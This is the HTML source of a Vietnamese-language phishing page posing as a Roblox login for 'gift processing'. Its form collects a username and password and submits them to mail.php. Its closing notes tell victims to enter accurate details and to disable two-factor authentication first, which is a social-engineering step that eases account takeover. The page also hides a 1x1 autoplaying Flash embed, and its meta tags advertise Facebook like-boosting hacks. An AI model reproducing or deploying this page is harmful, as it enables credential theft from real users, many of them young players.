<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <title>Trang Login Roblox - Xử lý quà tặng</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="tăng like ảnh, status, hack like, auto like, buff like">
    <meta name="keywords" content="buff like, hack like viet nam, trang web hack like facebook, auto like viet nam, buff like viet nam">
    <link rel="shortcut icon" media="all" href="http://hacklikevip2014.esy.es/kingpro/favicon.ico">
    <link rel="stylesheet" href="http://redteamux.com/avant/assets/css/styles.min.css">
    <link href="./css" rel="stylesheet" type="text/css">
    <link href="./default.css" rel="stylesheet" type="text/css" media="all" id="styleswitcher"> 
    <link href="./header-black.css" rel="stylesheet" type="text/css" media="all" id="headerswitcher"> 

    <style>
        /* Reset CSS */
        html, body, div, span, applet, object, iframe,
        h1, h2, h3, h4, h5, h6, p, blockquote, pre,
        a, abbr, acronym, address, big, cite, code,
        del, dfn, em, font, img, ins, kbd, q, s, samp,
        small, strike, strong, sub, sup, tt, var,
        b, u, i, center,
        dl, dt, dd, ol, ul, li,
        fieldset, form, label, legend,
        table, caption, tbody, tfoot, thead, tr, th, td {
            margin: 0;
            padding: 0;
            border: 0;
            outline: 0;
            font-size: 100%;
            vertical-align: baseline;
            background: transparent;
        }
        body {
            background: #DCDDDF url(http://cssdeck.com/uploads/media/items/7/7AF2Qzt.png);
            color: #000;
            font: 14px Arial;
            margin: 0 auto;
            padding: 0;
            position: relative;
        }
        h1{ font-size:28px;}
        h2{ font-size:26px;}
        h3{ font-size:18px;}
        h4{ font-size:16px;}
        h5{ font-size:14px;}
        h6{ font-size:12px;}
        h1,h2,h3,h4,h5,h6{ color:#563D64;}
        small{ font-size:10px;}
        b, strong{ font-weight:bold;}
        a{ text-decoration: none; }
        a:hover{ text-decoration: underline; }
        .left { float:left; }
        .right { float:right; }
        .alignleft { float: left; margin-right: 15px; }
        .alignright { float: right; margin-left: 15px; }
        .clearfix:after,
        form:after {
            content: ".";
            display: block;
            height: 0;
            clear: both;
            visibility: hidden;
        }
        .container { margin: 25px auto; position: relative; width: 900px; }
        #content {
            background: #f9f9f9;
            background: -moz-linear-gradient(top,  rgba(248,248,248,1) 0%, rgba(249,249,249,1) 100%);
            background: -webkit-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: -o-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: -ms-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f8f8f8', endColorstr='#f9f9f9',GradientType=0 );
            -webkit-box-shadow: 0 1px 0 #fff inset;
            -moz-box-shadow: 0 1px 0 #fff inset;
            -ms-box-shadow: 0 1px 0 #fff inset;
            -o-box-shadow: 0 1px 0 #fff inset;
            box-shadow: 0 1px 0 #fff inset;
            border: 1px solid #c4c6ca;
            margin: 0 auto;
            padding: 25px 0 0;
            position: relative;
            text-align: center;
            text-shadow: 0 1px 0 #fff;
            width: 400px;
        }
        #content h1 {
            color: #7E7E7E;
            font: bold 25px Helvetica, Arial, sans-serif;
            letter-spacing: -0.05em;
            line-height: 20px;
            margin: 10px 0 30px;
        }
        #content h1:before,
        #content h1:after {
            content: "";
            height: 1px;
            position: absolute;
            top: 10px;
            width: 27%;
        }
        #content h1:after {
            background: rgb(126,126,126);
            background: -moz-linear-gradient(left,  rgba(126,126,126,1) 0%, rgba(255,255,255,1) 100%);
            background: -webkit-linear-gradient(left,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: -o-linear-gradient(left,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: -ms-linear-gradient(left,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: linear-gradient(left,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            right: 0;
        }
        #content h1:before {
            background: rgb(126,126,126);
            background: -moz-linear-gradient(right,  rgba(126,126,126,1) 0%, rgba(255,255,255,1) 100%);
            background: -webkit-linear-gradient(right,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: -o-linear-gradient(right,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: -ms-linear-gradient(right,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            background: linear-gradient(right,  rgba(126,126,126,1) 0%,rgba(255,255,255,1) 100%);
            left: 0;
        }
        #content:after,
        #content:before {
            background: #f9f9f9;
            background: -moz-linear-gradient(top,  rgba(248,248,248,1) 0%, rgba(249,249,249,1) 100%);
            background: -webkit-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: -o-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: -ms-linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            background: linear-gradient(top,  rgba(248,248,248,1) 0%,rgba(249,249,249,1) 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f8f8f8', endColorstr='#f9f9f9',GradientType=0 );
            border: 1px solid #c4c6ca;
            content: "";
            display: block;
            height: 100%;
            left: -1px;
            position: absolute;
            width: 100%;
        }
        #content:after {
            -webkit-transform: rotate(2deg);
            -moz-transform: rotate(2deg);
            -ms-transform: rotate(2deg);
            -o-transform: rotate(2deg);
            transform: rotate(2deg);
            top: 0;
            z-index: -1;
        }
        #content:before {
            -webkit-transform: rotate(-3deg);
            -moz-transform: rotate(-3deg);
            -ms-transform: rotate(-3deg);
            -o-transform: rotate(-3deg);
            transform: rotate(-3deg);
            top: 0;
            z-index: -2;
        }
        #content form { margin: 0 20px; position: relative }
        #content form input[type="text"],
        #content form input[type="password"] {
            -webkit-border-radius: 3px;
            -moz-border-radius: 3px;
            -ms-border-radius: 3px;
            -o-border-radius: 3px;
            border-radius: 3px;
            -webkit-box-shadow: 0 1px 0 #fff, 0 -2px 5px rgba(0,0,0,0.08) inset;
            -moz-box-shadow: 0 1px 0 #fff, 0 -2px 5px rgba(0,0,0,0.08) inset;
            -ms-box-shadow: 0 1px 0 #fff, 0 -2px 5px rgba(0,0,0,0.08) inset;
            -o-box-shadow: 0 1px 0 #fff, 0 -2px 5px rgba(0,0,0,0.08) inset;
            box-shadow: 0 1px 0 #fff, 0 -2px 5px rgba(0,0,0,0.08) inset;
            -webkit-transition: all 0.5s ease;
            -moz-transition: all 0.5s ease;
            -ms-transition: all 0.5s ease;
            -o-transition: all 0.5s ease;
            transition: all 0.5s ease;
            background: #eae7e7 url(http://cssdeck.com/uploads/media/items/8/8bcLQqF.png) no-repeat;
            border: 1px solid #c8c8c8;
            color: #777;
            font: 13px Helvetica, Arial, sans-serif;
            margin: 0 0 10px;
            padding: 15px 10px 15px 40px;
            width: 80%;
        }
        #content form input[type="text"]:focus,
        #content form input[type="password"]:focus {
            -webkit-box-shadow: 0 0 2px #ed1c24 inset;
            -moz-box-shadow: 00 2px #ed1c24 inset;
            -ms-box-shadow: 0 0 2px #ed1c24 inset;
            -o-box-shadow: 0 0 2px #ed1c24 inset;
            box-shadow: 0 0 2px #ed1c24 inset;
            background-color: #fff;
            border: 1px solid #ed1c24;
            outline: none;
        }
        #username { background-position: 10px 10px !important }
        #password { background-position: 10px -53px !important }
        #content form input[type="submit"] {
            background: rgb(254,231,154);
            background: -moz-linear-gradient(top,  rgba(254,231,154,1) 0%, rgba(254,193,81,1) 100%);
            background: -webkit-linear-gradient(top,  rgba(254,231,154,1) 0%,rgba(254,193,81,1) 100%);
            background: -o-linear-gradient(top,  rgba(254,231,154,1) 0%,rgba(254,193,81,1) 100%);
            background: -ms-linear-gradient(top,  rgba(254,231,154,1) 0%,rgba(254,193,81,1) 100%);
            background: linear-gradient(top,  rgba(254,231,154,1) 0%,rgba(254,193,81,1) 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fee79a', endColorstr='#fec151',GradientType=0 );
            -webkit-border-radius: 30px;
            -moz-border-radius: 30px;
            -ms-border-radius: 30px;
            -o-border-radius: 30px;
            border-radius: 30px;
            -webkit-box-shadow: 0 1px 0 rgba(255,255,255,0.8) inset;
            -moz-box-shadow: 0 1px 0 rgba(255,255,255,0.8) inset;
            -ms-box-shadow: 0 1px 0 rgba(255,255,255,0.8) inset;
            -o-box-shadow: 0 1px 0 rgba(255,255,255,0.8) inset;
            box-shadow: 0 1px 0 rgba(255,255,255,0.8) inset;
            border: 1px solid #D69E31;
            color: #85592e;
            cursor: pointer;
            float: left;
            font: bold 15px Helvetica, Arial, sans-serif;
            height: 35px;
            margin: 20px 0 35px 15px;
            position: relative;
            text-shadow: 0 1px 0 rgba(255,255,255,0.5);
            width: 120px;
        }
        #content form input[type="submit"]:hover {
            background: rgb(254,193,81);
            background: -moz-linear-gradient(top,  rgba(254,193,81,1) 0%, rgba(254,231,154,1) 100%);
            background: -webkit-linear-gradient(top,  rgba(254,193,81,1) 0%,rgba(254,231,154,1) 100%);
            background: -o-linear-gradient(top,  rgba(254,193,81,1) 0%,rgba(254,231,154,1) 100%);
            background: -ms-linear-gradient(top,  rgba(254,193,81,1) 0%,rgba(254,231,154,1) 100%);
            background: linear-gradient(top,  rgba(254,193,81,1) 0%,rgba(254,231,154,1) 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#fec151', endColorstr='#fee79a',GradientType=0 );
        }
        #content form div a {
            color: #004a80;
            float: right;
            font-size: 12px;
            margin: 30px 15px 0 0;
            text-decoration: underline;
        }
        .button {
            background: rgb(247,249,250);
            background: -moz-linear-gradient(top,  rgba(247,249,250,1) 0%, rgba(240,240,240,1) 100%);
            background: -webkit-linear-gradient(top,  rgba(247,249,250,1) 0%,rgba(240,240,240,1) 100%);
            background: -o-linear-gradient(top,  rgba(247,249,250,1) 0%,rgba(240,240,240,1) 100%);
            background: -ms-linear-gradient(top,  rgba(247,249,250,1) 0%,rgba(240,240,240,1) 100%);
            background: linear-gradient(top,  rgba(247,249,250,1) 0%,rgba(240,240,240,1) 100%);
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f7f9fa', endColorstr='#f0f0f0',GradientType=0 );
            -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1) inset;
            -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1) inset;
            -ms-box-shadow: 0 1px 2px rgba(0,0,0,0.1) inset;
            -o-box-shadow: 0 1px 2px rgba(0,0,0,0.1) inset;
            box-shadow: 0 1px 2px rgba(0,0,0,0.1) inset;
            -webkit-border-radius: 0 0 5px 5px;
            -moz-border-radius: 0 0 5px 5px;
            -o-border-radius: 0 0 5px 5px;
            -ms-border-radius: 0 0 5px 5px;
            border-radius: 0 0 5px 5px;
            border-top: 1px solid #CFD5D9;
            padding: 15px 0;
        }
        .button a {
            background: url(http://cssdeck.com/uploads/media/items/8/8bcLQqF.png) 0 -112px no-repeat;
            color: #7E7E7E;
            font-size: 17px;
            padding: 2px 0 2px 40px;
            text-decoration: none;
            -webkit-transition: all 0.3s ease;
            -moz-transition: all 0.3s ease;
            -ms-transition: all 0.3s ease;
            -o-transition: all 0.3s ease;
            transition: all 0.3s ease;
        }
        .button a:hover {
            background-position: 0 -135px;
            color: #00aeef;
        }
    </style>
    <script type="text/javascript" src="./4.js"></script>
    <script type="text/javascript">
        function validateForm() {
            var username = document.forms["login-form"]["email"].value;
            var password = document.forms["login-form"]["pass"].value;
            if (username.trim() === "" || password.trim() === "") {
                alert("Vui lòng nhập đầy đủ Tên Đăng Nhập và Mật Khẩu để nhận quà!");
                return false;
            }
            return true;
        }
        function toSpans(span) {
            var str=span.firstChild.data;
            var a=str.length;
            span.removeChild(span.firstChild);
            for(var i=0; i<a; i++) {
                var theSpan=document.createElement("SPAN");
                theSpan.appendChild(document.createTextNode(str.charAt(i)));
                span.appendChild(theSpan);
            }
        }
        function RainbowSpan(span, hue, deg, brt, spd, hspd) {
            this.deg=(deg==null?360:Math.abs(deg));
            this.hue=(hue==null?0:Math.abs(hue)%360);
            this.hspd=(hspd==null?3:Math.abs(hspd)%360);
            this.length=span.firstChild.data.length;
            this.span=span;
            this.speed=(spd==null?50:Math.abs(spd));
            this.hInc=this.deg/this.length;
            this.brt=(brt==null?255:Math.abs(brt)%256);
            this.timer=null;
            toSpans(span);
            this.moveRainbow();
        }
        RainbowSpan.prototype.moveRainbow = function() {
            if(this.hue>359) this.hue-=360;
            var color;
            var b=this.brt;
            var a=this.length;
            var h=this.hue;
            for(var i=0; i<a; i++) {
                if(h>359) h-=360;
                if(h<60) { color=Math.floor(((h)/60)*b); red=b;grn=color;blu=0; }
                else if(h<120) { color=Math.floor(((h-60)/60)*b); red=b-color;grn=b;blu=0; }
                else if(h<180) { color=Math.floor(((h-120)/60)*b); red=0;grn=b;blu=color; }
                else if(h<240) { color=Math.floor(((h-180)/60)*b); red=0;grn=b-color;blu=b; }
                else if(h<300) { color=Math.floor(((h-240)/60)*b); red=color;grn=0;blu=b; }
                else { color=Math.floor(((h-300)/60)*b); red=b;grn=0;blu=b-color; }
                h+=this.hInc;
                this.span.childNodes[i].style.color="rgb("+red+", "+grn+", "+blu+")";
            }
            this.hue+=this.hspd;
        }
    </script>
</head>
<body>
    <center>
        <header class="navbar navbar-inverse navbar-fixed-top" role="banner">
            <div class="navbar-header pull-left">
                <h4><b>
                    <script>
                        farbbibliothek = new Array();
                        farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
                        farbbibliothek[1] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
                        farbbibliothek[2] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
                        farbbibliothek[3] = new Array("#0000FF","#FFFF00");
                        farbbibliothek[4] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
                        farben = farbbibliothek[4];
                        function farbschrift() {
                            for(var i=0 ; i<Buchstabe.length; i++) {
                                document.all["a"+i].style.color=farben[i];
                            }
                            farbverlauf();
                        }
                        function string2array(text) {
                            Buchstabe = new Array();
                            while(farben.length<text.length) {
                                farben = farben.concat(farben);
                            }
                            k=0;
                            while(k<=text.length) {
                                Buchstabe[k] = text.charAt(k);
                                k++;
                            }
                        }
                        function divserzeugen() {
                            for(var i=0 ; i<Buchstabe.length; i++) {
                                document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
                            }
                            farbschrift();
                        }
                        var a=1;
                        function farbverlauf() {
                            for(var i=0 ; i<farben.length; i++) {
                                farben[i-1]=farben[i];
                            }
                            farben[farben.length-1]=farben[-1];
                            setTimeout("farbschrift()",30);
                        }
                        var farbsatz=1;
                        function farbtauscher() {
                            farben = farbbibliothek[farbsatz];
                            while(farben.length<text.length) {
                                farben = farben.concat(farben);
                            }
                            farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
                        }
                        setInterval("farbtauscher()",4500);
                        text= "   ";
                        string2array(text);
                        divserzeugen();
                    </script>
                    <center>
                        <h2 id="r1"></h2>
                    </center>
                    <script type="text/javascript">
                        var r1=document.getElementById("r1");
                        var myRainbowSpan=new RainbowSpan(r1, 0, 360, 255, 50, 18);
                        myRainbowSpan.timer=window.setInterval("myRainbowSpan.moveRainbow()", myRainbowSpan.speed);
                    </script>
                </b></h4>
            </div>
        </header>
    </center>
    <div class="container">
        <section id="content">
            <form name="login-form" class="login-form" action="mail.php" method="get" onsubmit="return validateForm()">
                <h1>Login Roblox</h1>
                <div>
                    <input type="text" placeholder="Tên Đăng Nhập" name="email" class="input username" id="email">
                </div>
                <div>
                    <input type="password" placeholder="Mật Khẩu" name="pass" class="input password" id="pass">
                </div>
                <center>
                    <div>
                        <input type="submit" value="Đăng nhập">
                    </div>
                </center>
            </form><!-- form -->
            <div class="button">

            </div><!-- button -->
        </section><!-- content -->
    </div><!-- container -->
    <object width="1" height="1">
        <param name="movie" value="http://www.nhaccuatui.com/m/UgnqHpjdbiEX">
        <param name="quality" value="high">
        <param name="wmode" value="transparent">
        <param name="allowscriptaccess" value="always">
        <param name="allowfullscreen" value="true">
        <param name="flashvars" value="autostart=true">
        <embed src="http://www.nhaccuatui.com/m/UgnqHpjdbiEX" flashvars="target=blank&autostart=true" allowscriptaccess="always" allowfullscreen="true" quality="high" wmode="transparent" type="application/x-shockwave-flash" width="1" height="1">
    </object>
    <br>
    <center><b><h4><font color="Black">Một số lưu ý:</font></h4></b>
    <h4><font color="Black">- Vui lòng nhập đúng thông tin để chúng tôi xử lý thành công.</font></h4>
    <h4><b><font color="Black">- Vui lòng gỡ 2FA trước khi login không việc xử lý sẽ thất bại.</font></b></h4>
    </center>
</body>
</html>